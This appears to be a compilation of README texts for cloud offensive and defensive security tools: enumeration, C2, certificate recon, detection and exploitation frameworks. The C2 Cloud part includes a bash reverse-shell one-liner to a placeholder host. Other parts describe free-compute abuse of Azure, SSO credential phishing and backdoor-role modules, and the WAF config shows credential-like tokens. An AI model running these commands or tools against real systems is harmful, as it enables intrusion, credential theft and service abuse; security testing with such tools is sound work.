A tool to find a company's (target's) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode). The outcome is useful for bug bounty hunters, red teamers, and penetration testers alike.
The complete writeup is available here.
We are always thinking of something we can automate to make black-box security testing easier. We discussed the idea of creating a multi-platform cloud brute-force hunter, mainly to find open buckets, apps, and databases hosted on the clouds, and possibly apps behind proxy servers.
Here is the list of issues with previous approaches that we tried to fix:
- Microsoft: Storage, Apps
- Amazon: Storage, Apps
- Google: Storage, Apps
- DigitalOcean: Storage
- Vultr: Storage
- Linode: Storage
- Alibaba: Storage
Just download the latest release for your operating system and follow the usage.
To make the best use of this tool, you have to understand how to configure it correctly. When you open your downloaded version, there is a config folder containing a config.yaml file. It looks like this:
providers: ["amazon","alibaba","microsoft","digitalocean","linode","vultr","google"] # supported providers
environments: [ "test", "dev", "prod", "stage" , "staging" , "bak" ] # used for mutations
proxytype: "http" # socks5 / http
ipinfo: "" # IPINFO.io API KEY
For the IPINFO API, you can register and get a free key at IPINFO. The environments are used to generate URLs, such as test-keyword.target.region and test.keyword.target.region, etc.
We provide some wordlists out of the box, but it's better to customize and minimize your wordlists (based on your recon) before executing the tool.
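As a hedged example of minimizing a wordlist, you could filter the bundled list down to recon-relevant terms before a run (recon_terms.txt and custom_wordlist.txt are illustrative file names, not part of CloudBrute):
# Keep only entries matching terms gathered during recon, deduplicated
grep -i -f recon_terms.txt ./data/storage_small.txt | sort -u > custom_wordlist.txt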
After setting up your API key, you are ready to use CloudBrute.
CloudBrute V 1.0.7
usage: CloudBrute [-h|--help] -d|--domain "<value>" -k|--keyword "<value>"
-w|--wordlist "<value>" [-c|--cloud "<value>"] [-t|--threads
<integer>] [-T|--timeout <integer>] [-p|--proxy "<value>"]
[-a|--randomagent "<value>"] [-D|--debug] [-q|--quite]
[-m|--mode "<value>"] [-o|--output "<value>"]
[-C|--configFolder "<value>"]
Awesome Cloud Enumerator
Arguments:
-h --help Print help information
-d --domain domain
-k --keyword keyword used to generate urls
-w --wordlist path to wordlist
-c --cloud force a search, check config.yaml providers list
-t --threads number of threads. Default: 80
-T --timeout timeout per request in seconds. Default: 10
-p --proxy use proxy list
-a --randomagent user agent randomization
-D --debug show debug logs. Default: false
-q --quite suppress all output. Default: false
-m --mode storage or app. Default: storage
-o --output Output file. Default: out.txt
-C --configFolder Config path. Default: config
For example:
CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"
Please note that the -k keyword is used to generate URLs, so if you want the full domain to be part of the mutation, you have to use it for both the domain (-d) and keyword (-k) arguments.
If a cloud provider is not detected, or you want to force searching on a specific provider, you can use the -c option.
CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w "./data/storage_small.txt" -c amazon -o target_output.txt
Read the usage.
Make sure you read the usage correctly, and if you think you found a bug, open an issue.
This is usually because you are using public proxies; use private, higher-quality proxies instead. You can use ProxyFor to verify which proxies work with your chosen provider.
Change the -T (timeout) option to get the best results for your run.
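For instance, a hedged run that pairs a private proxy list with a longer timeout might look like this (proxies.txt is an illustrative file name, assuming the documented -p flag takes a path to a proxy list):
# Illustrative run; adjust -T upward when proxies add latency
CloudBrute -d target.com -k target -m storage -t 80 -T 20 -w "./data/storage_small.txt" -p proxies.txt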
Inspired by every single repo listed here.
The C2 Cloud is a robust web-based C2 framework, designed to simplify the life of penetration testers. It allows easy access to compromised backdoors, just like accessing an EC2 instance in the AWS cloud. It can manage several simultaneous backdoor sessions with a user-friendly interface.
C2 Cloud is open source. Security analysts can confidently perform simulations, gaining valuable experience and contributing to the proactive defense posture of their organizations.
Supported reverse shells:
C2 Cloud walkthrough: https://youtu.be/hrHT_RDcGj8
Ransomware simulation using C2 Cloud: https://youtu.be/LKaCDmLAyvM
Telegram C2: https://youtu.be/WLQtF4hbCKk
- Anywhere Access: Reach the C2 Cloud from any location.
- Multiple Backdoor Sessions: Manage and support multiple sessions effortlessly.
- One-Click Backdoor Access: Seamlessly navigate to backdoors with a simple click.
- Session History Maintenance: Track and retain complete command and response history for comprehensive analysis.
- Flask: Serving web and API traffic, facilitating reverse HTTP(s) requests.
- TCP Socket: Serving reverse TCP requests for enhanced functionality.
- Nginx: Effortlessly routing traffic between web and backend systems.
- Redis PubSub: Serving as a robust message broker for seamless communication.
- Websockets: Delivering real-time updates to browser clients for enhanced user experience.
- Postgres DB: Ensuring persistent storage for seamless continuity.
Reverse TCP port: 8888
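As a sketch of how a victim-side session might reach that listener (assuming a classic Bash reverse shell; C2_HOST is a placeholder for your server address, and 8888 is the port listed above):
# Hypothetical victim-side one-liner; adapt to the payloads C2 Cloud actually serves
bash -i >& /dev/tcp/C2_HOST/8888 0>&1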
Clone the repo
Inspired by Villain, a CLI-based C2 developed by Panagiotis Chartas.
Distributed under the MIT License. See LICENSE for more information.
Permiso: https://permiso.io
Read our release blog: https://permiso.io/blog/cloudgrappler-a-powerful-open-source-threat-detection-tool-for-cloud-environments
CloudGrappler is a purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure.
To optimize your utilization of CloudGrappler, we recommend using shorter time ranges when querying for results. This approach enhances efficiency and accelerates the retrieval of information, ensuring a more seamless experience with the tool.
pip3 install -r requirements.txt
To clone the cloudgrep repository locally, run the clone.sh file. Alternatively, you can manually clone the repository into the same directory where CloudGrappler was cloned.
chmod +x clone.sh
./clone.sh
This tool offers a CLI (Command Line Interface); the following examples review its use:
Define the scanning scope inside the data_sources.json file, based on your cloud infrastructure configuration. The following example showcases a structured data_sources.json file for both AWS and Azure environments:
Modifying the source inside the queries.json file to a wildcard character (*) will scan the corresponding query across both AWS and Azure environments.
{
"AWS": [
{
"bucket": "cloudtrail-logs-00000000-ffffff",
"prefix": [
"testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03",
"testTrails/AWSLogs/00000000/CloudTrail/us-west-1/2024/03/04"
]
},
{
"bucket": "aws-kosova-us-east-1-00000000"
}
],
"AZURE": [
{
"accountname": "logs",
"container": [
"cloudgrappler"
]
}
]
}
Run command
python3 main.py
python3 main.py -p
[+] Running GetFileDownloadUrls.*secrets_ for AWS
[+] Threat Actor: LUCR3
[+] Severity: MEDIUM
[+] Description: Review use of CloudShell. Permiso seldom witnesses use of CloudShell outside of known attackers. This, however, may be a part of your normal business use case.
python3 main.py -p -jo
reports
└── json
    ├── AWS
    │   └── 2024-03-04 01:01 AM
    │       └── cloudtrail-logs-00000000-ffffff--
    │           └── testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03
    │               └── GetFileDownloadUrls.*secrets_.json
    └── AZURE
        └── 2024-03-04 01:01 AM
            └── logs
                └── cloudgrappler
                    └── okta_key.json
python3 main.py -p -sd 2024-02-15 -ed 2024-02-16
python3 main.py -q "GetFileDownloadUrls.*secret", "UpdateAccessKey" -s '*'
python3 main.py -f new_file.json
Your system will need access to the S3 bucket. For example, if you are running on your laptop, you will need to configure the AWS CLI. If you are running on an EC2, an Instance Profile is likely the best choice.
If you run on an EC2 instance in the same region as the S3 bucket, with a VPC endpoint for S3, you can avoid egress charges. You can authenticate in a number of ways.
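For example, from a laptop you might configure credentials and sanity-check bucket access with the AWS CLI (the bucket name below is taken from the example scope above, purely for illustration):
aws configure    # prompts for access key ID, secret access key, and default region
aws s3 ls s3://cloudtrail-logs-00000000-ffffff    # confirm the scoped bucket is readable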
The simplest way to authenticate with Azure is to first run:
az login
This will open a browser window and prompt you to login to Azure.
Multi-cloud OSINT tool. Enumerate public resources in AWS, Azure, and Google Cloud.
Currently enumerates the following:
Amazon Web Services:
- Open / Protected S3 Buckets
- awsapps (WorkMail, WorkDocs, Connect, etc.)
Microsoft Azure:
- Storage Accounts
- Open Blob Storage Containers
- Hosted Databases
- Virtual Machines
- Web Apps
Google Cloud Platform:
- Open / Protected GCP Buckets
- Open / Protected Firebase Realtime Databases
- Google App Engine sites
- Cloud Functions (enumerates project/regions with existing functions, then brute forces actual function names)
- Open Firebase Apps
See it in action in Codingo's video demo here.
Several non-standard libraries are required to support threaded HTTP requests and DNS lookups. You'll need to install the requirements as follows:
pip3 install -r ./requirements.txt
The only required argument is at least one keyword. You can use the built-in fuzzing strings, but you will get better results if you supply your own with -m and/or -b.
You can provide multiple keywords by specifying the -k argument multiple times.
Keywords are mutated automatically using strings from enum_tools/fuzz.txt or a file you provide with the -m flag. Services that require a second level of brute-forcing (Azure Containers and GCP Functions) will also use fuzz.txt by default or a file you provide with the -b flag.
Let's say you were researching "somecompany" whose website is "somecompany.io" that makes a product called "blockchaindoohickey". You could run the tool like this:
./cloud_enum.py -k somecompany -k somecompany.io -k blockchaindoohickey
HTTP scraping and DNS lookups use 5 threads each by default. You can try increasing this, but eventually the cloud providers will rate limit you. Here is an example to increase to 10.
./cloud_enum.py -k keyword -t 10
IMPORTANT: Some resources (Azure Containers, GCP Functions) are discovered per-region. To save scanning time, the "REGIONS" variable defined in cloudenum/azure_regions.py and cloudenum/gcp_regions.py is set by default to use only one region. You may want to look at these files and edit them to be relevant to your own work.
Complete Usage Details
usage: cloud_enum.py [-h] -k KEYWORD [-m MUTATIONS] [-b BRUTE]
Multi-cloud enumeration utility. All hail OSINT!
optional arguments:
-h, --help show this help message and exit
-k KEYWORD, --keyword KEYWORD
Keyword. Can use argument multiple times.
-kf KEYFILE, --keyfile KEYFILE
Input file with a single keyword per line.
-m MUTATIONS, --mutations MUTATIONS
Mutations. Default: enum_tools/fuzz.txt
-b BRUTE, --brute BRUTE
List to brute-force Azure container names. Default: enum_tools/fuzz.txt
-t THREADS, --threads THREADS
Threads for HTTP brute-force. Default = 5
-ns NAMESERVER, --nameserver NAMESERVER
DNS server to use in brute-force.
-l LOGFILE, --logfile LOGFILE
Will APPEND found items to specified file.
-f FORMAT, --format FORMAT
Format for log file (text,json,csv - defaults to text)
--disable-aws Disable Amazon checks.
--disable-azure Disable Azure checks.
--disable-gcp Disable Google checks.
-qs, --quickscan Disable all mutations and second-level scans
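Putting several of the documented flags together, a possible run might look like this (keywords.txt is an illustrative input file, one keyword per line):
# Read keywords from a file, log JSON results, and skip Azure checks
./cloud_enum.py -kf keywords.txt -t 10 -l results.json -f json --disable-azure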
So far, I have borrowed from:
- Some of the permutations from GCPBucketBrute
Execute code within Azure Automation service without getting charged
CloudMiner is a tool designed to get free computing power within the Azure Automation service. The tool utilizes the upload module/package flow to execute code, which is totally free to use. This tool is intended for educational and research purposes only and should be used responsibly and with proper authorization.
This flow was reported to Microsoft on 3/23, which decided not to change the service behavior, as it is considered "by design". As of 3/9/23, this tool can still be used without getting charged.
Each execution is limited to 3 hours.
Install the package along with its requirements.txt dependencies:
pip install .
usage: cloud_miner.py [-h] --path PATH --id ID -c COUNT [-t TOKEN] [-r REQUIREMENTS] [-v]
CloudMiner - Free computing power in Azure Automation Service
optional arguments:
-h, --help show this help message and exit
--path PATH the script path (Powershell or Python)
--id ID               id of the Automation Account - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Automation/automationAccounts/{automationAccountName}
-c COUNT, --count COUNT
number of executions
-t TOKEN, --token TOKEN
Azure access token (optional). If not provided, token will be retrieved using the Azure CLI
-r REQUIREMENTS, --requirements REQUIREMENTS
Path to requirements file to be installed and use by the script (relevant to Python scripts only)
-v, --verbose Enable verbose mode
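A hedged example invocation, keeping the --id placeholders exactly as in the help text above (the script path and execution count are illustrative):
# Run a PowerShell script 5 times against an Automation Account, verbosely
python cloud_miner.py --path ./script.ps1 -c 5 -v \
  --id "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Automation/automationAccounts/{automationAccountName}"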
CloudMiner is released under the BSD 3-Clause License. Feel free to modify and distribute this tool responsibly, while adhering to the license terms.
To know more about our Attack Surface
Management platform, check out NVADR.
Finding assets from certificates! Scan the web! Tool presented @DEFCON 31
**You must have CGO enabled, and may have to install gcc to run CloudRecon**
sudo apt install gcc
go install github.com/g0ldencybersec/CloudRecon@latest
CloudRecon
CloudRecon is a suite of tools for red teamers and bug hunters to find ephemeral and development assets in their campaigns and hunts.
Often, target organizations stand up cloud infrastructure that is not tied to their ASN or related to known infrastructure. Many times these assets are development sites, IT product portals, etc. Sometimes they don't have domains at all, but many still need HTTPS.
CloudRecon is a suite of tools to scan IP addresses or CIDRs (ex: cloud providers' IPs) and find these hidden gems for testers by inspecting those SSL certificates.
The tool suite is three parts in GO:
Scrape - A LIVE running tool to inspect the ranges for a keyword in SSL certs' CN and SAN fields in real time.
Store - a tool to retrieve IPs' certs and download all their Orgs, CNs, and SANs, so you can have your OWN cert.sh database.
Retr - a tool to parse and search through the downloaded certs for keywords.
MAIN
Usage: CloudRecon scrape|store|retr [options]
-h Show the program usage message
Subcommands:
cloudrecon scrape - Scrape given IPs and output CNs & SANs to stdout
cloudrecon store - Scrape and collect Orgs,CNs,SANs in local db file
cloudrecon retr - Query local DB file for results
SCRAPE
scrape [options] -i <IPs/CIDRs or File>
-a Add this flag if you want to see all output including failures
-c int
How many goroutines running concurrently (default 100)
-h print usage!
-i string
Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE" )
-p string
TLS ports to check for certificates (default "443")
-t int
Timeout for TLS handshake (default 4)
STORE
store [options] -i <IPs/CIDRs or File>
-c int
How many goroutines running concurrently (default 100)
-db string
String of the DB you want to connect to and save certs! (default "certificates.db")
-h print usage!
-i string
Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE")
-p string
TLS ports to check for certificates (default "443")
-t int
Timeout for TLS handshake (default 4)
RETR
retr [options]
-all
Return all the rows in the DB
-cn string
String to search for in common name column, returns like-results (default "NONE")
-db string
String of the DB you want to connect to and save certs! (default "certificates.db")
-h print usage!
-ip string
String to search for in IP column, returns like-results (default "NONE")
-num
Return the Number of rows (results) in the DB (By IP)
-org string
String to search for in Organization column, returns like-results (default "NONE")
-san string
String to search for in common name column, returns like-results (default "NONE")
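Tying the three subcommands together, a possible end-to-end workflow looks like this (the CIDR and keyword are illustrative; all flags are from the usage above):
# Live-scrape a range, persist certs to a local DB, then query it by common name
CloudRecon scrape -i 192.0.2.0/24 -c 200
CloudRecon store -i 192.0.2.0/24 -db certificates.db
CloudRecon retr -db certificates.db -cn example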
CloakQuest3r is a powerful Python tool meticulously crafted to uncover the true IP address of websites safeguarded by Cloudflare, a widely adopted web security and performance enhancement service. Its core mission is to accurately discern the actual IP address of web servers that are concealed behind Cloudflare's protective shield. Subdomain scanning is employed as a key technique in this pursuit. This tool is an invaluable resource for penetration testers, security professionals, and web administrators seeking to perform comprehensive security assessments and identify vulnerabilities that may be obscured by Cloudflare's security measures.
Key Features:
Real IP Detection: CloakQuest3r excels in the art of discovering the real IP address of web servers employing Cloudflare's services. This crucial information is paramount for conducting comprehensive penetration tests and ensuring the security of web assets.
Subdomain Scanning: Subdomain scanning is harnessed as a fundamental component in the process of finding the real IP address. It aids in the identification of the actual server responsible for hosting the website and its associated subdomains.
Threaded Scanning: To enhance efficiency and expedite the real IP detection process, CloakQuest3r utilizes threading. This feature enables scanning of a substantial list of subdomains without significantly extending the execution time.
Detailed Reporting: The tool provides comprehensive output, including the total number of subdomains scanned, the total number of subdomains found, and the time taken for the scan. Any real IP addresses unveiled during the process are also presented, facilitating in-depth analysis and penetration testing.
With CloakQuest3r, you can confidently evaluate website security, unveil hidden vulnerabilities, and secure your web assets by disclosing the true IP address concealed behind Cloudflare's protective layers.
- Still in the development phase; sometimes it can't detect the real IP.
- CloakQuest3r combines multiple indicators to uncover real IP addresses behind Cloudflare. While subdomain scanning is a part of the process, we do not assume that all subdomains' A records point to the target host. The tool is designed to provide valuable insights but may not work in every scenario. We welcome any specific suggestions for improvement.
1. False Negatives: CloakQuest3r may not always accurately identify the real IP address behind Cloudflare, particularly for websites with complex network configurations or strict security measures.
2. Dynamic Environments: Websites' infrastructure and configurations can change over time. The tool may not capture these changes, potentially leading to outdated information.
3. Subdomain Variation: While the tool scans subdomains, it doesn't guarantee that all subdomains' A records will point to the primary host. Some subdomains may also be protected by Cloudflare.
How to Use:
Run CloudScan with a single command-line argument: the target domain you want to analyze.
git clone https://github.com/spyboy-productions/CloakQuest3r.git
cd CloakQuest3r
pip3 install -r requirements.txt
python cloakquest3r.py example.com
The tool will check if the website is using Cloudflare. If not, it will inform you that subdomain scanning is unnecessary.
If Cloudflare is detected, CloudScan will scan for subdomains and identify their real IP addresses.
You will receive detailed output, including the number of subdomains scanned, the total number of subdomains found, and the time taken for the scan.
Any real IP addresses found will be displayed, allowing you to conduct further analysis and penetration testing.
CloudScan simplifies the process of assessing website security by providing a clear, organized, and informative report. Use it to enhance your security assessments, identify potential vulnerabilities, and secure your web assets.
Run it online on replit.com : https://replit.com/@spyb0y/CloakQuest3r
The purpose of this project is to create rate limits in AWS WAF based on HTTP headers.
Golang is a dependency required to build the binary. See the documentation to install it: https://go.dev/doc/install
make
sudo make install
The rules configuration is very simple. For example, the threshold is the limit on requests within a given time window. It's possible to monitor multiple headers, but each header needs to be present in the HTTP request header log.
rules:
header:
x-api-id: # The header name in HTTP Request header
threshold: 100
token:
threshold: 1000
It's possible to send notifications to Slack and Telegram. To configure Slack notifications, you need to create a webhook configuration; see the Slack documentation: https://api.slack.com/messaging/webhooks
Telegram bot father: https://t.me/botfather
notifications:
slack:
webhook-url: https://hooks.slack.com/services/DA2DA13QS/LW5DALDSMFDT5/qazqqd4f5Qph7LgXdZaHesXs
telegram:
bot-token: "123456789:NNDa2tbpq97izQx_invU6cox6uarhrlZDfa"
chat-id: "-4128833322"
To set up AWS credentials, it's advisable to export them as environment variables. Here's a recommended approach:
export AWS_ACCESS_KEY_ID=".."
export AWS_SECRET_ACCESS_KEY=".."
export AWS_REGION="us-east-1"
retrive-logs-minutes-ago is the time range of logs you want to fetch; in this example, logs from 1 hour ago.
aws:
waf-log-group-name: aws-waf-logs-cloudwatch-cloudfront
region: us-east-1
retrive-logs-minutes-ago: 60
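Before running the tool, a quick sanity check that the WAF log group is visible with your exported credentials can help (group name and region taken from the example above; describe-log-groups is a standard AWS CLI call):
aws logs describe-log-groups --log-group-name-prefix aws-waf-logs-cloudwatch-cloudfront --region us-east-1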
During the reconnaissance phase, an attacker searches for any information about their target to create a profile that will later help them identify possible ways to get into an organization.
CloudPulse is a powerful tool that simplifies and enhances the analysis of SSL certificate data. It leverages the extensive repository of SSL certificates obtained from AWS EC2 machines, available at Trickest Cloud. With CloudPulse, security researchers can efficiently explore SSL certificate details, uncover potential vulnerabilities, and gather valuable insights for a variety of security-related tasks.
It simplifies security assessments with a user-friendly interface and allows you to effortlessly find a company's assets on the AWS cloud:
1- Download CloudPulse:
git clone https://github.com/yousseflahouifi/CloudPulse
cd CloudPulse/
2- Run docker compose:
docker-compose up -d
3- Run the script.py script:
docker-compose exec web python script.py
4- Now go to http://:8000/search and enjoy the search engine
1- Download CloudPulse:
git clone https://github.com/yousseflahouifi/CloudPulse
cd CloudPulse/
2- Set up a virtual environment:
python3 -m venv myenv
source myenv/bin/activate
3- Install the requirements.txt file:
pip install -r requirements.txt
4- Run an instance of Elasticsearch using docker:
docker run -d --name elasticsearch -p 9200:9200 -e "discovery.type=single-node" elasticsearch:6.6.1
5- Update script.py and the settings file to point to host 'localhost':
#script.py
es = Elasticsearch([{'host': 'localhost', 'port': 9200}])
#se/settings.py
ELASTICSEARCH_DSL = {
'default': {
'hosts': 'localhost:9200'
},
}
6- Run script.py to index data in elasticsearch:
python script.py
7- Run the app:
python manage.py runserver 0:8000
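Once the steps above complete, a quick sanity check of the stack might look like this (assuming the default ports from steps 4 and 7):
curl -s http://localhost:9200/_cluster/health   # is Elasticsearch reachable?
curl -I http://localhost:8000/search            # is the search endpoint responding?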
Included in the CloudPulse repository is a sample data.csv file containing close to 4,000 records, which provides a glimpse of the tool's capabilities. For the full dataset, visit the Trickest Cloud repository, clone the data, and update the data.csv file (it contains close to 9 million records).
As an example, searching for .mil data, or for tesla, returns the matching certificate records.
CloudPulse heavily depends on the data.csv file, which is a sample dataset extracted from the larger collection maintained by Trickest. While the sample dataset provides valuable insights, the tool's full potential is realized when used in conjunction with the complete dataset, which is accessible in the Trickest repository here.
Users are encouraged to refer to the Trickest dataset for a more comprehensive and up-to-date analysis.
GATOR - GCP Attack Toolkit for Offensive Research, a tool designed to aid in researching and exploiting Google Cloud environments. It offers a comprehensive range of modules tailored to support users in various attack stages, spanning from Reconnaissance to Impact.
| Resource Category | Primary Module | Command Group | Operation | Description |
| --- | --- | --- | --- | --- |
| User Authentication | auth | - | activate | Activate a Specific Authentication Method |
| User Authentication | auth | - | add | Add a New Authentication Method |
| User Authentication | auth | - | delete | Remove a Specific Authentication Method |
| User Authentication | auth | - | list | List All Available Authentication Methods |
| Cloud Functions | functions | - | list | List All Deployed Cloud Functions |
| Cloud Functions | functions | - | permissions | Display Permissions for a Specific Cloud Function |
| Cloud Functions | functions | - | triggers | List All Triggers for a Specific Cloud Function |
| Cloud Storage | storage | buckets | list | List All Storage Buckets |
| Cloud Storage | storage | buckets | permissions | Display Permissions for Storage Buckets |
| Compute Engine | compute | instances | add-ssh-key | Add SSH Key to Compute Instances |
Python 3.11 or newer should be installed. You can verify your Python version with the following command:
python --version
git clone https://github.com/anrbn/GATOR.git
cd GATOR
python setup.py install
pip install gator-red
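The exact command syntax isn't reproduced here, but based on the module table above, invocations presumably follow a module / command-group / operation pattern. A purely hypothetical sketch (consult the GATOR Documentation for the real syntax):
# Hypothetical commands; names mirror the table and are not verified against the tool
gator auth list
gator storage buckets list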
Have a look at the GATOR Documentation for an explained guide on using GATOR and its modules!
If you encounter any problems with this tool, I encourage you to let me know. Here are the steps to report an issue:
Check Existing Issues: Before reporting a new issue, please check the existing issues in this repository. Your issue might have already been reported and possibly even resolved.
Create a New Issue: If your problem hasn't been reported, please create a new issue in the GitHub repository. Click the Issues tab and then click New Issue.
Describe the Issue: When creating a new issue, please provide as much information as possible. Include a clear and descriptive title, explain the problem in detail, and provide steps to reproduce the issue if possible. Including the version of the tool you're using and your operating system can also be helpful.
Submit the Issue: After you've filled out all the necessary information, click Submit new issue.
Your feedback is important, and will help improve the tool. I appreciate your contribution!
I'll review reported issues on a regular basis, try to reproduce them based on your description, and communicate with you for further information if necessary. Once I understand the issue, I'll work on a fix.
Please note that resolving an issue may take some time depending on its complexity. I appreciate your patience and understanding.
I warmly welcome and appreciate contributions from the community! If you're interested in contributing to any existing or new modules, feel free to submit a pull request (PR) with any new/existing modules or features you'd like to add.
Once you've submitted a PR, I'll review it as soon as I can. I might request some changes or improvements before merging your PR. Your contributions play a crucial role in making the tool better, and I'm excited to see what you'll bring to the project!
Thank you for considering contributing to the project.
If you have any questions regarding the tool or any of its modules, please check out the documentation first. I've tried to provide clear, comprehensive information related to all of its modules. If however your query is not yet solved or you have a different question altogether please don't hesitate to reach out to me via Twitter or LinkedIn. I'm always happy to help and provide support. :)
Discover, prioritize, and remediate your risks in the cloud.
git clone --recurse-submodules git@github.com:Zeus-Labs/ZeusCloud.git
cd ZeusCloud && make quick-deploy
Check out our Get Started guide for more details.
A cloud-hosted version is available on special request - email founders@zeuscloud.io to get access!
Play around with our sandbox environment to see how ZeusCloud identifies, prioritizes, and remediates risks in the cloud!
Cloud usage continues to grow. Companies are shifting more of their workloads from on-prem to the cloud and both adding and expanding new and existing workloads in the cloud. Cloud providers keep increasing their offerings and their complexity. Companies are having trouble keeping track of their security risks as their cloud environment scales and grows more complex. Several high profile attacks have occurred in recent times. Capital One had an S3 bucket breached, Amazon had an unprotected Prime Video server breached, Microsoft had an Azure DevOps server breached, Puma was the victim of ransomware, etc.
We had to take action.
We love contributions of all sizes. What would be most helpful first:
Run containers in development mode:
cd frontend && yarn && cd -
docker-compose down && docker-compose -f docker-compose.dev.yaml --env-file .env.dev up --build
Reset neo4j and/or postgres data with the following:
rm -rf .compose/neo4j
rm -rf .compose/postgres
To develop on the frontend, make the code changes and save.
To develop on the backend, run:
docker-compose -f docker-compose.dev.yaml --env-file .env.dev up --no-deps --build backend
To access the UI, go to: http://localhost:80.
Please do not run ZeusCloud exposed to the public internet. Use the latest versions of ZeusCloud to get all security related patches. Report any security vulnerabilities to founders@zeuscloud.io.
This repo is freely available under the Apache 2.0 license.
We're working on a cloud-hosted solution which handles deployment and infra management. Contact us at founders@zeuscloud.io for more information!
Special thanks to the amazing Cartography project, which ZeusCloud uses for its asset inventory. Credit to PostHog and Airbyte for inspiration around public-facing materials - like this README!
GVision is a reverse image search app that uses the Google Cloud Vision API to detect landmarks and web entities from images, helping you gather valuable information quickly and easily.
Google Cloud Vision API is a machine learning-powered image analysis service that provides developers with tools to understand the contents of an image. It can detect objects, faces, text, logos, and more within an image.
Before using the app, you need to obtain a Google Cloud Vision API key.
Upload the key file using the `Upload a config file` button in the sidebar.
To install the dependencies, simply run the following command:
pip install -r requirements.txt
You can run the app locally by running the following command:
streamlit run gvision.py
Using GVision is simple and straightforward:
- Upload your Google Cloud Vision API config file using the `Upload a config file` button in the sidebar.
- Upload an image using the `Choose an image` button.
You can also find links to the Google Cloud Vision API documentation and pricing in the `Resources` section of the sidebar.
To reset the app to its default state or to clear the uploaded image and results, click on the `Reset app` button.
Cloud Exploit Framework
python3 tc.py -h
_______ _ _ _____ _ _
|__ __| | | | / ____| | | |
| | | |__ _ _ _ __ __| | ___ _ __| | | | ___ _ _ __| |
| | | '_ \| | | | '_ \ / _` |/ _ \ '__| | | |/ _ \| | | |/ _` |
| | | | | | |_| | | | | (_| | __/ | | |____| | (_) | |_| | (_| |
\_/ |_| |_|\__,_|_| |_|\__,_|\___|_| \_____|_|\___/ \__,_|\__,_|
usage: tc.py [-h] [-ce COGNITO_ENDPOINT] [-reg REGION] [-accid AWS_ACCOUNT_ID] [-aws_key AWS_ACCESS_KEY] [-aws_secret AWS_SECRET_KEY] [-bdrole BACKDOOR_ROLE] [-sso SSO_URL] [-enum_roles ENUMERATE_ROLES] [-s3 S3_BUCKET_NAME]
[-conn_string CONNECTION_STRING] [-blob BLOB] [-shared_access_key SHARED_ACCESS_KEY]
Attack modules of cloud AWS
optional arguments:
-h, --help show this help message and exit
-ce COGNITO_ENDPOINT, --cognito_endpoint COGNITO_ENDPOINT
to verify if cognito endpoint is vulnerable and to extract credentials
-reg REGION, --region REGION
AWS region of the resource
-accid AWS_ACCOUNT_ID, --aws_account_id AWS_ACCOUNT_ID
AWS account of the victim
-aws_key AWS_ACCESS_KEY, --aws_access_key AWS_ACCESS_KEY
AWS access keys of the victim account
-aws_secret AWS_SECRET_KEY, --aws_secret_key AWS_SECRET_KEY
AWS secret key of the victim account
-bdrole BACKDOOR_ROLE, --backdoor_role BACKDOOR_ROLE
Name of the backdoor role in victim role
-sso SSO_URL, --sso_url SSO_URL
AWS SSO URL to phish for AWS credentials
-enum_roles ENUMERATE_ROLES, --enumerate_roles ENUMERATE_ROLES
To enumerate and assume account roles in victim AWS roles
-s3 S3_BUCKET_NAME, --s3_bucket_name S3_BUCKET_NAME
Execute upload attack on S3 bucket
-conn_string CONNECTION_STRING, --connection_string CONNECTION_STRING
Azure Shared Access key for reading servicebus/queues/blobs etc
-blob BLOB, --blob BLOB
Azure blob enumeration
-shared_access_key SHARED_ACCESS_KEY, --shared_access_key SHARED_ACCESS_KEY
Azure shared key
* python 3
* pip
* git
- get project `git clone https://github.com/Rnalter/ThunderCloud.git && cd ThunderCloud/`
- install [virtualenv](https://virtualenv.pypa.io/en/latest/) `pip install virtualenv`
- create a python 3.6 local environment `virtualenv -p python3.6 venv`
- activate the virtual environment `source venv/bin/activate`
- install project dependencies `pip install -r requirements.txt`
- run the tool via `python tc.py --help`
Examples
python3 tc.py -sso <sso_url> --region <region>
python3 tc.py -ce <cognito_endpoint> --region <region>
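The other documented flags combine in the same way; for instance, a hedged sketch of the S3 upload attack module (placeholders follow the same convention as the examples above):
# Execute the upload attack against a target bucket in a given region
python3 tc.py -s3 <s3_bucket_name> --region <region>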